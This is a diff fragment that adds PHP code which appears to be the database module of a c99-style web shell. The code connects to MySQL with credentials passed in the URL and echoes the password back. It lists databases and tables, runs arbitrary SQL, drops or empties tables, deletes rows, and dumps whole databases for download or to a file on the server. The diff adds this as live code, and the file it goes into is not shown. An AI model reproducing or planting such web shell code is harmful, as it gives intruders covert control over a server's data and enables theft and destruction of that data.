+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+if (count($quicklaunch2) > 0) 
+{ 
+echo '<br>';
+ foreach($quicklaunch2 as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width=28% height=100 valign=top><li>If login is null, login is owner of process.<li>If host is null, host is localhost (default).</b><li>If port is null, port is 3306 (default).</td><td width=90% height=1 valign=top><TABLE height=1 cellSpacing=0 cellPadding=0 width=100% border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action="<?php echo $surl; ?>" method=POST><input type=hidden name="act" value="sql"><tr><td><input type=text name="sql_login" value="root" maxlength=64></td><td><input type=text name="sql_passwd" maxlength=64></td><td><input type=text name="sql_db" maxlength=64></td></tr><tr><td><b>Host</b></td><td><b>Port</b></td></tr><tr><td align=right><input type=text name="sql_server" value="localhost" maxlength=64></td><td><input type=text name="sql_port" value="3306" maxlength=6 size=3></td><td><input type=submit value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; 
+      echo "<option value=\"\">With selected:</option>"; 
+      echo "<option value=\"deleterow\">Delete</option>"; 
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; 
+     } 
+    } 
+    else 
+    { 
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock); 
+     if (!$result) {echo mysql_smarterror();} 
+     else 
+     { 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; 
+      $i = 0; 
+      $tsize = $trows = 0; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       $tsize += $row["Data_length"]; 
+       $trows += $row["Rows"]; 
+       $size = view_size($row["Data_length"]); 
+       echo "<tr>"; 
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; 
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; 
+       echo "<td>".$row["Rows"]."</td>"; 
+       echo "<td>".$row["Type"]."</td>"; 
+       echo "<td>".$row["Create_time"]."</td>"; 
